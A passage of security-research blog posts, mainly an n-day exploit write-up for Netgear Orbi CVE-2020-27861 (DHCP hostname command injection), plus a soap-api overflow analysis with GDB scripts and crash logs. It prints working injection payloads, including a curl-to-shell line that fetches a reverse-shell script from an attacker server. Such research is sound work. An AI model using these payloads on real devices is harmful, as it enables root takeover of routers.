I spent quite a bit of time trying to see whether I could turn this into a code execution bug, but as mentioned above, the FORTIFY_SOURCE=2 checks prevent the use of %n , which really complicates things. The only bypass technique I’ve been able to find is from a 2010 Phrack article, “A Eulogy for Format Strings”, which involves abusing the use of alloca in glibc’s internal vfprintf implementation to shift the stack and cause a 4-byte NULL write at a controllable location. This NULL write is used to overwrite the flag on the open file stream object for stdout which is used to determine whether to enforce the FORTIFY checks. I’m not sure whether that same behavior can be abused in modern glibc versions on 64-bit systems (pretty much everything I’ve found online is on 32-bit systems, and at least 6-7 years old) but I’m still playing around with it. I’ve been able to get some interesting behavior but nothing so far that’s gotten me closer to code exec in any significant way. In any case, I think it may be an area worth exploring, if at least to confirm whether some bypass can be achieved on modern systems. If not, I may end up just building a vulnerable version without the fortify checks and write an exploit for that.

So, for now, no code exec :(.

Reference/Resources

• libinput Gitlab Issue #752
• Accidental Intrusion, CVE-2022-1215 (blog post by the researcher(s) that reported the bug)
• A Eulogy for Format Strings (Phrack 0x43)
• Facedancer
• Stack Canaries

introduction

As I’ve mentioned in previous posts, I’ve been hunting for bugs on the Netgear Orbi for about a year and half. A few weeks ago, I came across an advisory for an unauthenticated command injection vulnerability that was reported to Netgear back in December 2020 and realized that the vulnerable firmware version was the same one that was installed on my device back when I first started looking for bugs on it. In fact, the issue had only been fixed about a month before then. If only I’d started looking just a little bit sooner! Since it was way too late for that, I thought it’d be fun to see if I could find where the vulnerability was located and write a functional exploit to gain full control of the device.

initial analysis

There were no known exploits for this vulnerability at the time I started looking and the only useful information came from the CVE entry on Mitre:

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR Orbi 2.5.1.16 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the UA_Parser utility. A crafted Host Name option in a DHCP request can trigger execution of a system call composed from a user-supplied string. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-11076.

Even though it’s not much, this provided enough information to narrow things down to a specific binary and a specific input path. It would mostly come down to finding the bug and working up from there to trace the input back to the source.

finding the vulnerability

With the info taken from the advisory, I moved on to analyzing the vulnerable version of UA_Parser to try to find where the vulnerability occurred. Since I knew this was command injection, the most likely suspect was insecure use of system() to execute commands. I loaded the binary up in Ghidra and used the symbol table to select system() and then used the Function Call Tree to check the functions that had incoming references to it. While doing this, I came across the following code snippet in one of these functions (annotated for clarity):

This code stood out as a good candidate for command injection given that the argument passed to system() is a string constructed with what looked like user-controlled data. Additionally, the values are placed inside double quotes, which would allow for expansion.

I then took a look at the function I labeled get_host_from_file() at line 78 in the image above and learned that this function eventually reads from a file at /tmp/netscan/attach_device , which contains entries for each client connected to the router, including MAC, IP, and hostname. It parses out the hostname it finds and fills the static buffer hostname which is passed as an argument to get_host_from_file(). This value is eventually passed as the 4th format string arg to snprintf() on line 84, which constructs the string that is passed to system().

At this point I felt pretty confident this was where the vulnerability occurred, but to get additional confirmation I took a look at the version of UA_Parser included with a firmware that was released after this bug was fixed (v2.7.3.22) to compare. The only thing that changed between the two snippets is the double-quotes that surround the user-controlled values were replaced with single-quotes (also known as ‘strong-quotes’), where no expansion/meta-character interpretation occurs:

tracing the data from sink → source

The next thing I needed to figure out was how the hostname value eventually reached this code. As mentioned above, UA_Parser reads the hostname value from the file /tmp/netscan/attach_device. I didn’t find any other references to this file in UA_Parser that indicated it writing to the file, so I used grep to recursively search the root filesystem I had extracted from the firmware image to find other files that referenced it. This is when I came across the binary /usr/sbin/net-scan which seemed like a good lead given the name.

After spending some time going through the code in Ghidra, I eventually found the function used to write /tmp/netscan/attach_device which I labeled update_attach_devices(). There was only a single reference to this function, which occured within another function that appeared to be the main entrypoint to trigger a ‘device scan’; this function is also only referenced once (from main()):

Naturally, my next question was about where/how net-scan was getting the values it used to populate the attached devices file. I spent some more time looking through the decompiled code and eventually came across a function that opened a file at /tmp/dhcpd_hostlist for reading. This caught my attention because the advisory for the vulnerability mentioned that a “crafted Host Name option in a DHCP request can trigger execution of a system call”, so it made sense that net-scan would get it’s values from whatever the DHCP server had received.

Another recursive grep later, I had confirmed that the DHCP server binary (/sbin/udhcpd and /sbin/udhcpd-ext) contained references to /tmp/dhcpd_hostlist. Since the source code for udhcp is included in the GPL sources for the device provided by the vendor, I took a look there and found the string in leases.h as a constant called HOSTNAME_SHOWFILE. This value is used in some custom code in a function called show_clients_hostname() in dhcpd.c (shown below at line 111) which writes the MAC/IP and hostname for each lease in the global leases structure to this file.

Below is a snippet of code from sendACK() in serverpacket.c:, one of two locations where show_clients_hostname() is called. One detail that became really important later is the call to toupper() on line 535 — it’s called for each character in the hostname string before it is saved to the lease object where it’s saved. This causes all alphabetic letters to be uppercased in the value that’s written out to /tmp/dhcpd_hostlist and eventually ends up in the vulnerable call to system().

summary of the analysis

• the vulnerability occurs in UA_Parser due to a call to system() using a string containing a attacker-controlled hostname value
• UA_Parser reads the hostname value from /etc/netscan/attach_device
• UA_Parser is executed by a binary called net-scan used to detect attached devices
• net-scan creates the file /etc/netscan/attach_device
• net-scan reads the hostname values from the file /tmp/dhcpd_hostlist
• /tmp/dhcpd_hostlist is created by udhcpd using the hostnames saved in it’s global leases array
• udhcpd populates the hostname field for each lease struct in the global array using values received in DHCP REQUEST packets

testing setup

debugging

I created the following GDB script to set breakpoints on main() and system() when I attached to UA_Parser , as well as set the fork-mode settings to be sure the debugger follows the processes as they spawn.

set breakpoint pending on
set follow-fork-mode child
break main
commands 1
set follow-fork-mode parent
continue
end

break system
commands 2
info args
backtrace full
info frame
info registers
x/s $r0
x/s $r1
x/s $r2
continue
end

net-scan runs periodically in the background on the device but a re-scan can also be manually triggered by loading the “Attached Devices” page in the web admin UI. This is what I used during testing to force it to run the vulnerable code. Interestingly, I later discovered it would run even with unauthenticated requests to the homepage, so an attacker would actually be able to trigger the vulnerable code on-demand.

Below is a screenshot of the GDB script breaking on system() while attached to the UA_Parser process and triggering the vulnerable code. The argument that was passed to system() can be seen near the bottom of the register listing (the call to ‘devices_info update …’).

payload delivery

In order to send custom DHCP hostname values easily and establish DHCP connections, I used udcpc, which allows for passing in a custom hostname at the command line. I used this command after connecting to the Orbi using a static IP and confirmed the payload appeared in the relevant files.

sudo ./udhcpc -H "\$PATH" -f -i <interface> -n

With everything set up to be able to deliver payloads, it was time to start building one.

crafting payloads

using parameter+substring expansion to build a payload

As mentioned earlier in this post, each character in the hostname value that udhcpd receives from clients is uppercased before it’s saved to the global leases array and eventually written to /tmp/dhcpd_hostlist. This means that by the time UA_Parser reads these value from /tmp/netscan/attach_device, a payload like $(reboot) would be transformed to $(REBOOT). Linux and native Linux file systems are case-sensitive, which means any such payload would fail to execute the desired program. So, I needed to find a way to call binaries using only uppercase letters, alphanumeric symbols, and numbers.

My first thought was I would likely need to use shell expansion and environment variables since they typically use uppercase names. I did a bit of Googling and came across this page about bash parameter expansion, which seemed like a viable way to construct a working payload. Specifically, I thought substring expansion could be used slice up pieces of environment variables to grab the characters needed to build a payload. With this in mind, I checked what environment variables were available in the shell for root (the UA_Parser process runs as root) and quickly realized I would have to get pretty creative given what was was there.

I played around with different patterns in the shell while connected via serial and eventually found one that made use of both parameter and filepath expansion which would expand out to /sbin/reboot built up from characters sliced from the $PATH env variable

${PATH:4:5}/${PATH:3:1}?????

In this context, the ? symbol is used to match up to a single character — the expansion works because reboot is the only binary in /sbin that starts with r followed by 5 characters. The screenshot below shows the final payload constructed piece by piece.

The final step was to place this payload within a shell context using command substitution so that once the string expanded out it would be interpreted as a command. To do this I wrapped the payload inside $() syntax and set everything up to do a test run. After getting a DHCP lease with the crafted request and attaching to the running UA_Parser process, I loaded the Attached Devices page in the web UI and caused net-scan to run. Easy peasy, right?

Yeah, right. It’s never that easy.

more constraints: html encoding

The screenshow below shows the debugger output when catching the vulnerable call to system() with the payload above.

This is when I discovered there was some filtering happening and certain characters are HTML encoded. Specifically, the parentheses characters are encoded in the payload above. I went back through code for net-scan and found the function responsible for the encoding — the full list of encoded characters are:

• < > ( ) & ' " \

I also learned that net-scan truncates the hostname string read from the DHCP host list at 32 characters before writing it to /tmp/netscan/attach_device.

Pretty rough! Almost every useful character (in regards to shell manipulation) is encoded and there’s a pretty tight length limit, which only makes writing a functional exploit that much more difficult. But, first I had to get code execution, so I pushed on.

success: backquote command substitution

There was really only one other option left to get to get command execution considering parenthese were filtered and that was the use the older backquote form of substitution:

`${PATH:4:5}/${PATH:3:1}?????`

I did the usual dance to connect and send a DHCP request while attached to the UA_Parser process with GDB. After triggering net-scan again, I caught the call to system() and saw that a new chain of calls had occurred and reboot had been called. The device then began to reboot!

And there it is, a working proof-of-concept showing the bug could be exploited…

escaping constraints: arbitrary code execution

Okay, but rebooting the device isn’t particularly cool. Now it was time to think about what could actually be done with the bug.

To recap, the contraints for the payload are:

• 32 character length limit
• All letters get uppercased
• Filters chars: < > ( ) & ' " \
• must build payload from chars in env variables + file/parameter expansion:
  • PATH=/usr/sbin:/usr/bin:/sbin:/bin
  • HOME=/tmp
  • HOSTNAME=RBR20

The length limit was probably the most frustrating part of this whole thing when combined with the uppercasing issue — it could easily take 7-9 characters to do the expansion needed to grab a single character for the final payload, so using up those 32 characters was very easy. The inability to use > or < also meant using redirection to overwrite files wasn’t an option.

With all of this in mind, I narrowed down the possible attack scenarios to the following:

• Leak admin credentials back to the attacker somehow
• Reset the admin password
• Download and execute a script to run arbitrary commands without dealing with constraints

I spent a couple of days experimenting with what felt like hundreds of payloads and possible angles to achieve one of the results above. Again, that length limit SUCKED — on multiple occasions I had figured out working payloads that ended up exceeding the limit by 1-2 characters and immediately became useless. At the end of each session I would tell myself I would give up and that it just wasn’t possible to do anything useful given the restrictions. Then the next day when I signed back on I would get sucked back in, convinced there just had to be a way.

going after curl

After tons of failed attempts, I eventually came to a conclusion: in order to do anything useful, I would need to find a way to break out of / get around the length limit. Having determined this, I knew the only feasible way forward would be to find a way to download a script from a remote source and run it, which would avoid the uppercasing issues, length limits, etc. With this in mind, I shifted my focus to figuring out a way to use the curl or wget binaries on the router to achieve this.

This finally paid off after another couple of hacking sessions when I figured out the following payload:

The first part makes use of expansion to match /usr/bin/curl, which is used to make a request to a server (hy.me in this example), and pipes the contents of the response to a shell (pointed to by $0).

In order to test this and show it working without having to actually go out and buy a two character domain (which apparently go for anywhere between $500 - $15k), I edited /etc/hosts on the device to add a record pointing hy.me to my ‘evil’ server where I was running a Python web server that would respond with the contents of a shell script to requests for the root path (to use as few characters as possible).

The screenshot below shows everything in action, going counter-clockwise starting at the top-left:

• the udhcpc process that sent the payload
• the code for the Python webapp that returns code to spawn a reverse shell
• the running webapp showing requests were received from the Orbi
• (open telnet session, unrelated)
• the netcat listener receiving the connection from reverse shell

conclusion

There it is: there’s now an exploit for CVE-2020-27861 and it can be used to completely take over a vulnerable Orbi device. In total, it took about a week to go from starting to initial analysis to finally getting arbitrary code execution, with most of the time being spent on figuring out how to create a payload to actually do something useful given the restrictions. It was pretty fun and I was able to pick up some new techniques for dealing with payload constraints for command execution.

The most important lesson learned? Persistence pays off (usually). I really didn’t think a full exploit would be possible and almost gave up before getting full system control, but I’m glad I kept pushing. I’ll probably start spending more time doing this kind of n-day research and monitoring advisories for specific devices/applications to hopefully be able to do this for a more recent vuln.

Resources

• Netgear Advisory
• Mitre CVE listing: CVE-2020-27861
• Parameter expansion [Bash Hackers]
• PayloadAllTheThings Reverse Shell Cheatsheet

introduction

The Orbi provides a SOAP server which seems to primarily be used by the Netgear mobile application, reachable at http://<ROUTER>/soap/server_sa. I had originally discovered this endpoint early on when I started looking at this router but it wasn’t until I had connected over serial that I realized it was incredibly easy to crash the binary that handles SOAP requests, /usr/sbin/soap-api. In fact, almost every requests I sent to this endpoing caused a stack trace to be printed to the console. This seemed like a good enough place to start so I decided to figure out exactly what caused these crashes and whether any of it was exploitable.

Note: I chose to write about this issue and not report it to Netgear since merely crashing the soap-api process does very little and doesn’t even really work as a denial-of-service mechanism because a new process is spawned on each request. As far as I can tell there’s no security impact here.

background

The SOAP server parses the HTTP header SOAPAction on incoming requests to determine which SOAP action/method the user wants to trigger. The request is initially handled by lighttpd, where mod_cgi handles initial processing and passes it onto soap-api. The server sets environment variables that describe the request, which soap-api then reads from in order to handle it.

The format of the SOAPAction header is:

• <urn:VENDOR:service:ACTION_str:1#METHOD_str .

crash discovery

While doing some manual testing after starting with a known-good SOAPAction header value, I found that server would send the following response when submitting a METHOD_str part that is 248 characters or longer while simultaneously causing a crash dump to be printed to the console .

HTTP/1.1 200 OK
Content-Length: 763
Content-Type: text/xml; charset="UTF-8"
Server: Linux/2.6.15 uhttpd/1.0.0 soap/1.0
Connection: close
Date: Fri, 25 Jun 2021 14:09:01 GMT

<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope
   xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
   SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<m:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAResponse xmlns:m="urn:NETGEAR-ROUTER:service:x:1"></m:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

SOAP Len:0 Action:x Method:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgd = d7854000
[00000000] *pgd=00000000

CPU: 3 PID: 26769 Comm: soap-api Tainted: P             3.14.77 #1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtask: dce74380 ti: d6014000 task.ti: d6014000
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPC is at 0xb6b52db4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALR is at 0xb6b4ee88
AAAAAAAAAAAAAAAAAAA IP:10.13.13.211

pc : [<b6b52db4>]    lr : [<b6b4ee88>]    psr: 60000010
sp : befff398  ip : 7f5fce58  fp : 7f6026fc
r10: befff424  r9 : befff44c  r8 : befff48c
r7 : befff54c  r6 : befff400  r5 : 7f5d4594  r4 : 00000000
r3 : 00000000  r2 : 00000001  r1 : 00000000  r0 : 00000000
Flags: nZCv  IRQs on  FIQs on  Mode USER_32  ISA ARM  Segment user
Control: 10c5387d  Table: 9785406a  DAC: 00000015
CPU: 3 PID: 26769 Comm: soap-api Tainted: P             3.14.77 #1
[<c021ea68>] (unwind_backtrace) from [<c021bb60>] (show_stack+0x10/0x14)
[<c021bb60>] (show_stack) from [<c03b5518>] (dump_stack+0x78/0x98)
[<c03b5518>] (dump_stack) from [<c02234b0>] (__do_user_fault+0x74/0xbc)
[<c02234b0>] (__do_user_fault) from [<c022385c>] (do_page_fault+0x2f0/0x370)
[<c022385c>] (do_page_fault) from [<c02083dc>] (do_DataAbort+0x34/0x98)
[<c02083dc>] (do_DataAbort) from [<c02096f4>] (__dabt_usr+0x34/0x40)
Exception stack(0xd6015fb0 to 0xd6015ff8)
5fa0:                                     00000000 00000000 00000001 00000000
5fc0: 00000000 7f5d4594 befff400 befff54c befff48c befff44c befff424 7f6026fc
5fe0: 7f5fce58 befff398 b6b4ee88 b6b52db4 60000010 ffffffff

Unfortunately, it was nearly impossible to identify where the crash was actually happening from the crash dump alone as the stack trace only shows the top of the call stack containing chain of calls in the kernel that handled the fault. Since the stack trace was no help, I figured the next step was to load soap-api up in Ghidra and find where the SOAPACtion header was being parsed and trace it through the application, looking for places where it could overflow a buffer.

first find: buffer overflow in SendSoapResponse()

After digging through functions in the binary for a while and looking for strings that looked familiar/related to the output i was getting from the server, I found the following piece of code at function 0x0003e82c. From looking at the non-stripped versions of this binary, I was able to identify this function as SendSoapResponse. This function is responsible for constructing the HTTP response, including the response headers, sent to the client.

The overflow occurs on line 48 in the decompiled code shown above as a result of the call to sscanf(). This line parses the SOAP method section from the server response content (<m:AAAAA[...]Response) and writes it to the buffer auStack236 , which is a 64-byte static buffer, without any length checks. At this point I felt pretty confident this was the crash I was seeing in the stack traces, so next I wanted to understand what paths led to this code being executed.

After reading through the code some more I realized almost every request eventually led to SendSoapResponse() (I mean, duh, right?). In general, the flow always goes a little something like this:

• main()
  • takes care of getting the SOAPAction header from an environment variable SOAP_ACTION or HTTP_SOAPACTION (set by the parent HTTP server (lighttpd) or the CGI handler (modcgi, procgi))
  • handles parsing of the SOAP action and SOAP method parts from the header
  • saves pointers to the start of each section in the buffer/PTR returned by getenv()
  • these ptrs are passed to SoapExecute()
• SoapExecute()
  • The main function that actually does handling of the various SOAP actions and methods
  • Handles authentication checks
  • Calls appropriate functions/etc based on submitted actions / method
  • at the end of pretty much every case, it calls SendSoapRespCode(), passing the soap_action and soap_method pointers as arguments
• SendSoapRespCode()
  • Constructs a portion of the HTTP response one of two ways depending on whether the SOAP method was Authenticate or not
  • The HTML/XML blob is then passed on to SendSoapResponse() along with the SOAPAction header value
• SendSoapResponse()
  • Here the final response content is finalized and sent to the client

live debugging

At this point I felt pretty confident I was crashing soap-api from this buffer overflow so I was eager to see whether this bug would be exploitable. The stack traces I was seeing didn’t contain anything that immediately stood out as fishy (0x41s in registers, etc), so I wanted to do some live debugging on the device to validate my theory and poke around in memory. Since I had been unable to build a functional emulation environment where I could run soap-api , I would have to debug on the baremetal. I used a static GDB for armhf downloaded from here: https://github.com/therealsaumil/static-arm-bins and copied it over to the Orbi.

For each request that accesses SOAP functionality, lighttpd forks and (something) eventually executes soap-api to handle this request. I initially had some trouble getting the debugger to catch when soap-api was spawned and stay attached while other forks were created in the background, but eventually found a sequence of gdb commands that allowed me to catch soap-api early and then tell gdb to stay attached.

These were:

• create break on main()
• set follow-fork-mode child
• continue
• after sending a request, lighttpd forks and gdb attaches to soap-api and breaks on main()
• set follow-fork-mode parent (to prevent new forks from taking over)
• continue

This was enough to allow GDB to stay attached to the process up until the SIGSEGV, though there were still other issues that broke backtraces and the lack of debug symbols only made this harder. To avoid having to go through this sequence manually each time, I wrote up a GDB script to set everything up and insert break points on sscanf() and to catch signal 11. Each time the sscanf breakpoint is hit we print a backtrace, frame info, registers, and the 10 words from the current stack pointer, and do the same on segfault.

set width 0
set height 0
set verbose off

set follow-fork-mode child
break main
commands 1
set follow-fork-mode parent
continue
end

break sscanf
commands 2
backtrace full
info frame
info registers
x/10x $sp
continue
end

catch signal 11
commands 3
bt full
i frame
i registers
end

continue

lolwut: a null dereference

With the debugging setup figured out, I attached GDB to the lighttpd process, passed it the script, and then sent a request to trigger the bug — and then I got this:

This output seemed to indicate that:

• The crash was happening in strcmp in libc.so.1
• The crash was actually caused by a NULL dereference when the code attempted to access the address stored in register r0 , which is 0 at the time of the crash

deep dive: SendSoapResponse()

At this point, I was pretty confused. The condition for the crash was definitely tied to the length of the SOAP method and there’s definitely a buffer overflow, but that wasn’t what was causing the bug. I tried different payload lengths and values to see if it caused anything other than a null pointer defer but was unsuccessful. This is when I decided it was time to go back to Ghidra and go through the code line-by-line to try to understand what was happening.

how the payload reaches SendSoapResponse()

The SOAP action and method strings are initially parsed from the SOAPAction HTTP header in main() and these are passed in as arguments to other functions that use them. By the time execution reaches SendSoapResponse(), the method and action strings have been used to construct the SOAP response body by the calling function SendSoapRespCode(). The code snippet below shows how the SOAP body string is constructed:

  char resp[512];
  char *resp_fmt = "<m:%sResponse xmlns:m=\"urn:NETGEAR-ROUTER:service:%s:1\"></m:%sResponse>\r\n<ResponseCode>%03d</ResponseCode>\r\n";
  snprintf(resp_b, 512, resp_fmt, SOAP_METHOD, SOAP_ACTION, SOAP_METHOD, response_code);

Assuming a method “METHOD”, action “ACTION, and response code 404, the resulting string would be:

<m:METHODResponse xmlns:m="urn:NETGEAR-ROUTER:service:ACTION:1"></m:METHODResponse>
<ResponseCode>404</ResponseCode>

snprintf() will read 512 bytes at most, but that can occur in the first format string it inserts if it’s long enough, resulting in no further formatting and the rest of the string being truncated. For example, submitting a method string containing 500 A’s results in the following string:

<m:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAResponse

code breakdown

The code block below is the same as the one shown in the screenshot in the “first find” section earlier in this post but with annotations and renamed variables from after having gone through it all and labeled everything.

Ghidra decompiler output:

/*1*/      if (is_soap_login == 1) {
/*2*/        local_jwt_ptr = (char *)cat_file("/tmp/jwt_local");
/*3*/       fprintf(stream,
/*4*/                "HTTP/1.0 200 OK\r\nContent-Length: %d\r\nContent-Type: text/xml; charset=\"UTF-8\"\r\nS erver: Linux/2.6.15 uhttpd/1.0.0 soap/1.0\r\nSet-Cookie: jwt_local=%s\r\n\r\n"
/*5*/                ,total_content_len,local_jwt_ptr);
/*6*/      }
/*7*/      else {
/*8*/        fprintf(stream,
/*9*/                "HTTP/1.0 200 OK\r\nContent-Length: %d\r\nContent-Type: text/xml; charset=\"UTF-8\"\r\nS erver: Linux/2.6.15 uhttpd/1.0.0 soap/1.0\r\n\r\n"
/*10*/                ,total_content_len);
/*11*/      }
/*12*/      soap_log(2,
/*13*/               "HTTP/1.0 200 OK\r\nContent-Length: %d\r\nContent-Type: text/xml; charset=\"UTF-8\"\r\nSe rver: Linux/2.6.15 uhttpd/1.0.0 soap/1.0\r\n"
/*14*/               ,total_content_len);
/*15*/      fputs(s_<?xml_version="1.0"_encoding="UT_000bd624,stream);
/*16*/      fputs(resp,stream);
/*17*/      fputs(s_</SOAP-ENV:Body>_</SOAP-ENV:Enve_000bd6fc,stream);
/*18*/      soap_log(0,"%s%s%s",s_<?xml_version="1.0"_encoding="UT_000bd624,resp,
/*19*/               s_</SOAP-ENV:Body>_</SOAP-ENV:Enve_000bd6fc);
/*20*/      fflush(stream);

/*21*/      if ((ext_mode == 0) &&
/*22*/         (total_content_len = config_invmatch("installState",&DAT_0008d1a0), total_content_len != 0)) {
/*23*/                        /* OVERFLOW - method_response_buf is 64 bytes and sscanf does not check length
/*24*/                            */
/*25*/        sscanf(resp,"<m:%sResponse%*s",method_response_buf);
/*26*/        strstr_Response_ret = (char *)strstr_wrapper(method_response_buf,"Response");
/*27*/        if (strstr_Response_ret != (char *)0x0) {
/*28*/          *strstr_Response_ret = '\0';
/*29*/        }
/*30*/                        /* POSSIBLE NULL DEREF, strstr_wrapper might return null */
/*31*/        ptr_to_substrings_found = (char *)strstr_wrapper(resp,"service:");
/*32*/        sscanf(ptr_to_substrings_found,"service:%[^:]",service_action_buf);
/*33*/        ptr_to_substrings_found = (char *)strstr_wrapper(resp,"<ResponseCode>");
/*34*/        if (ptr_to_substrings_found != (char *)0x0) {
/*35*/          sscanf(ptr_to_substrings_found,"<ResponseCode>%[^<]",&local_114);
/*36*/        }
/*37*/        vsnprintf_wrap(combined_action_method_str,0x80,"%s:%s",service_action_buf,method_response_buf);
/*38*/        execve_wrapper_maybe
/*39*/                  ("/dev/console",0,3,"/usr/sbin/ra_installevent","soapresponse",
/*40*/                   combined_action_method_str,&local_114,0);
/*41*/        FUN_0001ae0c("ra_install","method=%s, code=%s",combined_action_method_str,&local_114);
/*42*/      }

• Arguments:
  • FILE *stream: filestream where response will be written (socket back to client?)
  • char *resp: a 512 byte buffer containing the body of the XML SOAP response contructed by the calling function (DoSoapRespCode)
• Lines 1-20 in the snippet handle constructing and send the response content to the client by writing that content to the file stream passed in as the first argument to SendSoapResponse
  • note: this is why the response is always sent no matter
• Line 25: a call to sscanf to attempt to parse the SOAP method string
  • other functions up the call stack have parsed and placed the method string into an XML component in the resp argument passed to SendSoapResponse
  • sscanf searches for the pattern <m:*Response* and will parse the content between the colon up to the end of ‘Response’
  • method_response_buf is a static 64 byte buffer
  • its possible to overflow this buffer if the string between <m: and Response* is greater than 64 bytes, which appears to be possible to do
• Line 26: a call to a strstr wrapper to check for the presence of the string “Response ” in the data that was read into method_response_buf by sscanf
  • this wrapper first checks to make sure neither of the two arguments passed to it are NULL
    • if either of them are, it doesn’t call strstr and just returns a NULL pointer
    • if they’re not, it calls strstr and then returns whatever strstr returned; strstr also returns NULL if the string is not found
  • If the submitted SOAP method has pushed Response string entirely off of the XML buffer that is constructed, this would return NULL
• Line 27-29: if the call to strstr did NOT return NULL (the Response string was found), set the value at the first char of Response to NULL
  • This null terminates the string so that only the SOAP method part is parsed by other funcs that stop reading at NULL and the Response part is truncated
• Line 31: another call to strstr wrapper, this time checking the resp argument containing the XML constructed by the calling function for the string "service:"
  • there is no check after this to see if this returned NULL
• Line 32: second call to sscanf that attempts to parse the SOAP action string from the pattern "service:*:" , this time using the value returned by the call to strstr on the previous line as it’s source
  • since this value was not checked for NULL before this call to sscanf, this is likely the path taken to reach the crash condition
  • this only happens when the method string was sufficiently long to have pushed "service:*:" string off of the XML body buffer resp
• Line 33: third call to strstr wrapper, this time searching for the string "<ResponseCode>" in resp otherwise this is skipped
• Line 34: if the string was found by the call to strstr in the previous line, sscanf is used to parse out a substring similar to previous calls; otherwise this is just skipped.

takeaways

After going through the code, I knew the following:

1. It is possible to overflow method_response_buf that the first call to sscanf() writes the method string to.
2. It is possible to overflow service_action_buf that the second call to sscanf() writes the action string to.
3. A NULL dereference will occur in the second call to sscanf if the string 'service:' is not found in resp.
   1. This will occur if the method string submitted is long enough to cause the SOAP action portion (service:) to be truncated from the final response data in resp

Knowing this, it was clear to see why the payloads I was sending were causing the null dereference: the method strings were sufficiently long to have caused the 'service:' string to be truncated from the end of resp, causing the strstr() call which checks for it to return a null pointer that is then passed to sscanf() without checking if it was null first.

(failed) exploit attempt #1

The results of the code analysis indicated that in order to successfully trigger a crash caused by the buffer overflow, the following conditions would need to be met:

• the method string needs to be long enough for the overflow to be useful (i.e. overwriting the return address, base pointer, etc.)
• the final contents of resp must include the string 'service:' ]

With this in mind, I went back and spent some time trying payloads I thought would successfully avoid triggering the null defererence but was ultimately unsuccessful. My (incorrect) conclusion was that the conditions necessary to overwrite something important made it impossible to ensure the check for to service string would be passed. I had tried putting it both at the beginning and end of the payload string but this still caused the null deref every time. I had been looking at this bug for a few days at this point and had was pretty exhausted so I just called it at that point and concluded that the even though the buffer overflow was there, it was ‘unreachble’ due to the (incorrect) contstraints I had in mind at the time. Honestly, I was just relieved to be done with it.

exploit viability, revisited

As hinted at above, I did eventually revisit the question of whether the buffer overflow could be triggered a few weeks later and found a way to do it! In fact, it actually happened while I was in the process of writing the first part of this post, where I was basically going to end with section before this one, saying there was no way to get around it. While I was reading through my notes and trying to clean everything up and make sure it all made sense, I noticed I had made some mistakes and incorrect assumptions that had caused me to have an inaccurate understanding of the contstraints. I’ve corrected those mistakes and cleaned things up in the code breakdown above in the interest of clarity but basically I had an incorrect understanding of the constraints and the behavior of sscanf() . Anyway, I updated my mental model of the bug.

With a new understanding of the constraints , I went back to the code and did some more testing to see if it would be possible to overflow method_response_buf while avoiding the NULL deference caused by failing the check for "service:". Assuming this can be done successfully, the program should then crash due to failing a stack canary check. Stack canary protection (as well as PIE and RELRO) was enabled between firmware versions 2.5.1.16 - 2.7.33.

From the GPL archive (soap-api is part of the net-cgi package):

./package/dni/net-cgi/Makefile:TARGET_CFLAGS += -Werror -Wl,-z,now -Wl,-z,relro -fPIE -pie -fstack-protector

local testing

In order to get a better understanding of the actual behavior of the application with a better debugging environment to work in, I wrote the following code to simulate the same behavior on my own system.

int replica (FILE *stream, char *resp) {
	// THE ORDER OF VARIABLES IN MEMORY IS IMPORTANT TO REPRODUCE ACCURATELY (or at least close to accurate)
	int content_len;
	char* jwt;
	char *var2;
	char *var3;
	char *var4;
	char method_buf[64];
	char action_buf[32];
	char combined_action_method[128];
	char *undef1;
	char *undef2;
	int stack_check_val;

	printf("resp: %s\n", resp);

	// fake stack canary
	stack_check_val = 0x313373;
	printf("[+] stack check start: 0x%x\n", stack_check_val);

	// null the buffers
	memset(method_buf, 0, 64);
	memset(action_buf, 0, 32);
	memset(combined_action_method, 0, 128);

	// call sscanf - 1: parse the Method portion from the xml blob in resp
	// and save it to method buf (format is '<m:METHODResponse*'). there is a buffer overflow
	// here if the parsed string is greater than 64 bytes
